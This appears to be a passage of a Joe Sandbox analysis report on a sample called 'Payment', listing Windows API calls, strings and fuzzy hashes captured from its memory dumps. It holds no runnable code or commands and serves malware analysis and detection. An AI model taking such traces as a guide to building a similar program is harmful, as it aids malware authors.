                                                          • CharLowerBuffW.USER32(?,?,00B5F910), ref: 00B3AB76
                                                          • GetDriveTypeW.KERNEL32(00000061,00B8A620,00000061), ref: 00B3AC40
                                                          • _wcscpy.LIBCMT ref: 00B3AC6A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 65ed4f865687ffc23c37511784d5f953dc78cc2764599dba74454405a504462a
                                                          • Instruction ID: 6cbec29f2a8cf5e7595a1d4ca29439775c21e7afaf4624527c38f295716e7390
                                                          • Opcode Fuzzy Hash: 65ed4f865687ffc23c37511784d5f953dc78cc2764599dba74454405a504462a
                                                          • Instruction Fuzzy Hash: 0E51AA311083019FC724EF14C991AAEB7E5EF95300F6048AEF5D6972A2EB31D94ACB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: 4e23630b2469825d0a5c98d834b553c312f9338092e2b721b809a165629032f1
                                                          • Instruction ID: 27aa88a724f6f5ae56ea8259b3668d6918ea6534386a44a8a940c1119d37d911
                                                          • Opcode Fuzzy Hash: 4e23630b2469825d0a5c98d834b553c312f9338092e2b721b809a165629032f1
                                                          • Instruction Fuzzy Hash: E241847160460AAEDB34AB74D942E7B77F8EB44300F2444AFF64AD73A1EA71D941CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B573D9
                                                          • CreateMenu.USER32 ref: 00B573F4
                                                          • SetMenu.USER32(?,00000000), ref: 00B57403
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B57490
                                                          • IsMenu.USER32(?), ref: 00B574A6
                                                          • CreatePopupMenu.USER32 ref: 00B574B0
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B574DD
                                                          • DrawMenuBar.USER32 ref: 00B574E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: 2d3801521007a66f8c2c5d6ae3966426adfa91dbee4ea8a0bc3b1c74813b56b9
                                                          • Instruction ID: 2ca24b8d1bedfc55fab6a84b7a8f2b63a9ac1a256baefbfe2a3a463ed0509d44
                                                          • Opcode Fuzzy Hash: 2d3801521007a66f8c2c5d6ae3966426adfa91dbee4ea8a0bc3b1c74813b56b9
                                                          • Instruction Fuzzy Hash: D2416775A00249EFDB10DF64E884FAABBF5FF09342F1440A9EE0597360DB30A914CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B577CD
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00B577D4
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B577E7
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B577EF
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B577FA
                                                          • DeleteDC.GDI32(00000000), ref: 00B57803
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00B5780D
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B57821
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B5782D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 34972d060755f0915d4b7b2d8e39f81e7b541abfa1e8bc9e15d0dbd084af1275
                                                          • Instruction ID: 61a8983172a664dcb3615320523aae88bad0990159ca5b1c72fd6d1ab429848f
                                                          • Opcode Fuzzy Hash: 34972d060755f0915d4b7b2d8e39f81e7b541abfa1e8bc9e15d0dbd084af1275
                                                          • Instruction Fuzzy Hash: 42318E31205215ABDF125F65EC09FEB7BA9EF0D322F1002A5FA15A61A0DB31D815DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00AF707B
                                                            • Part of subcall function 00AF8D68: __getptd_noexit.LIBCMT ref: 00AF8D68
                                                          • __gmtime64_s.LIBCMT ref: 00AF7114
                                                          • __gmtime64_s.LIBCMT ref: 00AF714A
                                                          • __gmtime64_s.LIBCMT ref: 00AF7167
                                                          • __allrem.LIBCMT ref: 00AF71BD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF71D9
                                                          • __allrem.LIBCMT ref: 00AF71F0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF720E
                                                          • __allrem.LIBCMT ref: 00AF7225
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF7243
                                                          • __invoke_watson.LIBCMT ref: 00AF72B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                          • Instruction ID: 7c3f95580cc1d875af80536f3a7399e2ef1e547f596e75387f04b89446f579ff
                                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                          • Instruction Fuzzy Hash: A671A571A0471AABE7149FB9CC41BBEB7F8AF14720F14427AF614D62C1EB70DA508790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B32A31
                                                          • GetMenuItemInfoW.USER32(00B96890,000000FF,00000000,00000030), ref: 00B32A92
                                                          • SetMenuItemInfoW.USER32(00B96890,00000004,00000000,00000030), ref: 00B32AC8
                                                          • Sleep.KERNEL32(000001F4), ref: 00B32ADA
                                                          • GetMenuItemCount.USER32(?), ref: 00B32B1E
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00B32B3A
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00B32B64
                                                          • GetMenuItemID.USER32(?,?), ref: 00B32BA9
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B32BEF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B32C03
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B32C24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: fdedbf6bda266a2eb53e833451bd7aad05c53dcc791cbe892a2ba6f08715ab81
                                                          • Instruction ID: fb430d766273e6c92da188d775f9d0a811c6cd140bef5c15990b50248320599f
                                                          • Opcode Fuzzy Hash: fdedbf6bda266a2eb53e833451bd7aad05c53dcc791cbe892a2ba6f08715ab81
                                                          • Instruction Fuzzy Hash: EB618EB090024AAFDF21CF64DD88EBEBBF8EB45304F2445D9E941A7251EB31AD45DB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B57214
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B57217
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B5723B
                                                          • _memset.LIBCMT ref: 00B5724C
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B5725E
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B572D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: c84520e538ecd43dc7251d4bfccefe21db7c582c69406803c5b4e99dc14cf858
                                                          • Instruction ID: 70b8379750cb66e4c7363a6ccfabcfd57f692558bbccfb6ebd48ae7d712fe0f6
                                                          • Opcode Fuzzy Hash: c84520e538ecd43dc7251d4bfccefe21db7c582c69406803c5b4e99dc14cf858
                                                          • Instruction Fuzzy Hash: E5615B71A40208AFDB10DFA4DD81FEE77F8EB09710F14419AFE14A72A1DB70A945DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B27135
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B2718E
                                                          • VariantInit.OLEAUT32(?), ref: 00B271A0
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B271C0
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00B27213
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B27227
                                                          • VariantClear.OLEAUT32(?), ref: 00B2723C
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B27249
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B27252
                                                          • VariantClear.OLEAUT32(?), ref: 00B27264
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B2726F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: b4cfac51ab46e2f3539e5b071cf0a47477564d91ea6762e5d66fba2501bf7a73
                                                          • Instruction ID: ba39edd380def138f07fc7fdf4bfd322f1b3c07e76b5ffacba428d6bce16817c
                                                          • Opcode Fuzzy Hash: b4cfac51ab46e2f3539e5b071cf0a47477564d91ea6762e5d66fba2501bf7a73
                                                          • Instruction Fuzzy Hash: 2C410D35904229EFCF00EF64E844AAEBBB9FF48355F0080A9E955A7361DF34A945CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00B45AA6
                                                          • inet_addr.WSOCK32(?,?,?), ref: 00B45AEB
                                                          • gethostbyname.WSOCK32(?), ref: 00B45AF7
                                                          • IcmpCreateFile.IPHLPAPI ref: 00B45B05
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B45B75
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B45B8B
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B45C00
                                                          • WSACleanup.WSOCK32 ref: 00B45C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 8f4d38a27f19a53a0c7b6374a619d5653ea89ff657a4a355da18551c250b5769
                                                          • Instruction ID: bcb431c33f529fa93d47518bd06a58eaa5389d3172989a8258baaf010a3e4304
                                                          • Opcode Fuzzy Hash: 8f4d38a27f19a53a0c7b6374a619d5653ea89ff657a4a355da18551c250b5769
                                                          • Instruction Fuzzy Hash: 3F519331604B019FD721EF24CD85B2ABBE4EF48710F1489AAF556DB2A2DB70ED40DB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B3B73B
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B3B7B1
                                                          • GetLastError.KERNEL32 ref: 00B3B7BB
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00B3B828
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: df1e17a459d0ba96733c7764107fd0bb6f49f52e39fe61d56c99e308df3e3cb0
                                                          • Instruction ID: 594d92cd9558a9bf18bf860fcd6de81a89de3489ac8c6f779c913a2cc50455c5
                                                          • Opcode Fuzzy Hash: df1e17a459d0ba96733c7764107fd0bb6f49f52e39fe61d56c99e308df3e3cb0
                                                          • Instruction Fuzzy Hash: D3314135A00205EFDB10EF68C985EBEBBF8EF44740F2440AAE606D72A5DB719D42CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B294F6
                                                          • GetDlgCtrlID.USER32 ref: 00B29501
                                                          • GetParent.USER32 ref: 00B2951D
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B29520
                                                          • GetDlgCtrlID.USER32(?), ref: 00B29529
                                                          • GetParent.USER32(?), ref: 00B29545
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B29548
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 0ca02555ba96b62d003d5f8990c06a7347179a4e619c9978a8d182ef849a09b9
                                                          • Instruction ID: 40bfb5216318b7fd0064fff9b9cd3063d4300cac0fc449a9a3a8ea23a0d96bef
                                                          • Opcode Fuzzy Hash: 0ca02555ba96b62d003d5f8990c06a7347179a4e619c9978a8d182ef849a09b9
                                                          • Instruction Fuzzy Hash: 8321F170E00214BBCF05AB60DC85EFEBBB4EF59300F1041AAB966972A2DF755919DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B295DF
                                                          • GetDlgCtrlID.USER32 ref: 00B295EA
                                                          • GetParent.USER32 ref: 00B29606
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B29609
                                                          • GetDlgCtrlID.USER32(?), ref: 00B29612
                                                          • GetParent.USER32(?), ref: 00B2962E
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B29631
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: ad5899cd6da4080c8a44c0f2d67dd092bb0814e0bd2b4d65ac02ec9c3fa7dbfe
                                                          • Instruction ID: 9971bcc8715fcb4939bc4ed08c8da8839e9052d66aecba484213e290d22e8447
                                                          • Opcode Fuzzy Hash: ad5899cd6da4080c8a44c0f2d67dd092bb0814e0bd2b4d65ac02ec9c3fa7dbfe
                                                          • Instruction Fuzzy Hash: 6321D070A00215BBDF05AB60CCC5EFEBBF8EF58300F104196B926972A1DB759919DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32 ref: 00B29651
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B29666
                                                          • _wcscmp.LIBCMT ref: 00B29678
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B296F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 059442cf43c3637cf5d7f41b11759df532aa5d5c8364902aee43e881b5031cad
                                                          • Instruction ID: 97ec1417865e2d52cfbbbaf30a3a138d3b1a98d1e33874635a55951a049e3b3c
                                                          • Opcode Fuzzy Hash: 059442cf43c3637cf5d7f41b11759df532aa5d5c8364902aee43e881b5031cad
                                                          • Instruction Fuzzy Hash: E311C47624832BBAEF022660EC06DF677D8CB14760F2001E6FA08A50F1FE9159118658
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00B48BEC
                                                          • CoInitialize.OLE32(00000000), ref: 00B48C19
                                                          • CoUninitialize.OLE32 ref: 00B48C23
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00B48D23
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B48E50
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B62C0C), ref: 00B48E84
                                                          • CoGetObject.OLE32(?,00000000,00B62C0C,?), ref: 00B48EA7
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00B48EBA
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B48F3A
                                                          • VariantClear.OLEAUT32(?), ref: 00B48F4A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: ab21c391cbfc195d4e5482de3036eb4e3f46eac6daa41312b8a1eb64f4e60d45
                                                          • Instruction ID: b34fd7fb2ef2582637277cb74433ffb28c20c633a1e17f0e646ac85ede2315df
                                                          • Opcode Fuzzy Hash: ab21c391cbfc195d4e5482de3036eb4e3f46eac6daa41312b8a1eb64f4e60d45
                                                          • Instruction Fuzzy Hash: A2C10571608305AFD700EF64C88492BB7E9FF89748F1049ADF58A9B261DB71EE05CB52
                                                          Uniqueness

